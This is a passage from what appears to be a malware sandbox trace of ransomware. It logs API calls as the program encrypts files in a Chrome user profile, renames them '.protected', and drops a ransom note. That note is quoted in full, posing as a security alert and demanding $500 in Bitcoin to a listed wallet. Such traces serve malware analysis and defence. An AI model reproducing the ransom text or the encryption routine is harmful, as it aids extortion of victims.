SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.136] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0084.137] lstrlenA (lpString="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") returned 684 [0084.137] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 
[0084.137] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.137] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0084.137] CloseHandle (hObject=0x154) returned 1 [0084.137] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.137] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="Windows") returned -1 [0084.137] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="Program Files") returned -1 [0084.137] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="Program Files (x86)") returned -1 [0084.137] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="$Recycle.bin") returned 1 [0084.137] lstrcmpiW (lpString1="JumpListIconsOld", lpString2="System Volume Information") returned -1 [0084.137] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld") returned 96 [0084.137] lstrcmpW (lpString1="JumpListIconsOld", lpString2=".") returned 1 [0084.137] lstrcmpW (lpString1="JumpListIconsOld", lpString2="..") returned 1 [0084.137] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\*") returned 98 [0084.137] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0084.138] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.138] 
lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.138] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.138] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.138] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.138] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\.") returned 98 [0084.138] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.138] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.138] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.138] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.138] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.138] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.138] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.138] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\..") returned 99 [0084.138] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.138] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.138] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.138] lstrcmpiW (lpString1="2B03.tmp", lpString2="Windows") returned -1 [0084.138] lstrcmpiW (lpString1="2B03.tmp", lpString2="Program Files") returned -1 [0084.138] lstrcmpiW (lpString1="2B03.tmp", lpString2="Program Files (x86)") returned -1 [0084.138] lstrcmpiW (lpString1="2B03.tmp", lpString2="$Recycle.bin") returned 1 [0084.138] lstrcmpiW (lpString1="2B03.tmp", lpString2="System Volume Information") returned -1 
[0084.138] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp") returned 105 [0084.138] StrStrIW (lpFirst="2B03.tmp", lpSrch=".protected") returned 0x0 [0084.138] lstrcmpW (lpString1="2B03.tmp", lpString2="RESTORE_FILES.txt") returned -1 [0084.138] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.138] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b03.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.139] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp") returned 105 [0084.139] StrStrW (lpFirst="2B03.tmp", lpSrch=".txt") returned 0x0 [0084.139] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp") returned 105 [0084.139] StrStrW (lpFirst="2B03.tmp", lpSrch=".rar") returned 0x0 [0084.139] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp") returned 105 [0084.139] StrStrW (lpFirst="2B03.tmp", lpSrch=".zip") returned 0x0 [0084.139] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: 
lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.140] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.140] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.140] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.140] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.141] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.141] CloseHandle (hObject=0x158) returned 1 [0084.141] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp.protected") returned 115 [0084.141] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b03.tmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b03.tmp.protected")) returned 1 [0084.142] FindNextFileW (in: hFindFile=0x47bb10, 
lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.142] lstrcmpiW (lpString1="2B04.tmp", lpString2="Windows") returned -1 [0084.142] lstrcmpiW (lpString1="2B04.tmp", lpString2="Program Files") returned -1 [0084.142] lstrcmpiW (lpString1="2B04.tmp", lpString2="Program Files (x86)") returned -1 [0084.142] lstrcmpiW (lpString1="2B04.tmp", lpString2="$Recycle.bin") returned 1 [0084.142] lstrcmpiW (lpString1="2B04.tmp", lpString2="System Volume Information") returned -1 [0084.142] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp") returned 105 [0084.142] StrStrIW (lpFirst="2B04.tmp", lpSrch=".protected") returned 0x0 [0084.142] lstrcmpW (lpString1="2B04.tmp", lpString2="RESTORE_FILES.txt") returned -1 [0084.142] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.142] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b04.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.142] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp") returned 105 [0084.142] StrStrW (lpFirst="2B04.tmp", lpSrch=".txt") returned 0x0 [0084.142] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\JumpListIconsOld\\2B04.tmp") returned 105 [0084.142] StrStrW (lpFirst="2B04.tmp", lpSrch=".rar") returned 0x0 [0084.142] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp") returned 105 [0084.142] StrStrW (lpFirst="2B04.tmp", lpSrch=".zip") returned 0x0 [0084.142] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.143] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.143] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.143] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.143] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.144] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.144] CloseHandle (hObject=0x158) returned 1 [0084.144] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp.protected") returned 115 [0084.144] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\JumpListIconsOld\\2B04.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b04.tmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b04.tmp.protected")) returned 1 [0084.145] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0084.145] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0084.145] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\RESTORE_FILES.txt") returned 114 [0084.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.161] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.161] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0084.162] lstrlenA (lpString="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") returned 684 [0084.162] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.162] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.162] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0084.162] CloseHandle (hObject=0x154) returned 1 [0084.162] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.162] lstrcmpiW (lpString1="Local Extension Settings", lpString2="Windows") returned -1 [0084.162] lstrcmpiW (lpString1="Local Extension Settings", lpString2="Program Files") returned -1 [0084.162] lstrcmpiW (lpString1="Local Extension Settings", lpString2="Program Files (x86)") returned -1 [0084.162] lstrcmpiW (lpString1="Local Extension Settings", lpString2="$Recycle.bin") returned 1 [0084.162] lstrcmpiW (lpString1="Local Extension Settings", lpString2="System Volume Information") returned -1 [0084.162] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings") returned 104 [0084.162] lstrcmpW (lpString1="Local Extension Settings", lpString2=".") returned 1 [0084.162] lstrcmpW (lpString1="Local Extension Settings", lpString2="..") returned 1 [0084.163] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\*") returned 106 [0084.163] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0084.163] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.163] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.163] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.163] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.163] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.163] wnsprintfW (in: pszDest=0x4bfb20, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\.") returned 106 [0084.163] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.163] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.163] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.163] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.163] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.163] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.163] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.163] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\..") returned 107 [0084.163] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.163] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.163] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.164] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="Windows") returned -1 [0084.164] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="Program Files") returned -1 [0084.164] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="Program Files (x86)") returned -1 [0084.164] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="$Recycle.bin") returned 1 [0084.164] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="System Volume Information") returned -1 [0084.164] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension 
Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi") returned 137 [0084.164] lstrcmpW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2=".") returned 1 [0084.164] lstrcmpW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="..") returned 1 [0084.164] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\*") returned 139 [0084.164] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0084.165] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.165] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.165] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.165] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.165] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.166] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\.") returned 139 [0084.166] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.166] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.166] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.166] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.166] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.166] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.166] lstrcmpiW (lpString1="..", lpString2="System Volume Information") 
returned -1 [0084.166] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\..") returned 140 [0084.166] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.166] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.166] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.166] lstrcmpiW (lpString1="000003.log", lpString2="Windows") returned -1 [0084.166] lstrcmpiW (lpString1="000003.log", lpString2="Program Files") returned -1 [0084.166] lstrcmpiW (lpString1="000003.log", lpString2="Program Files (x86)") returned -1 [0084.166] lstrcmpiW (lpString1="000003.log", lpString2="$Recycle.bin") returned 1 [0084.166] lstrcmpiW (lpString1="000003.log", lpString2="System Volume Information") returned -1 [0084.166] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log") returned 148 [0084.166] StrStrIW (lpFirst="000003.log", lpSrch=".protected") returned 0x0 [0084.166] lstrcmpW (lpString1="000003.log", lpString2="RESTORE_FILES.txt") returned -1 [0084.166] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.166] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
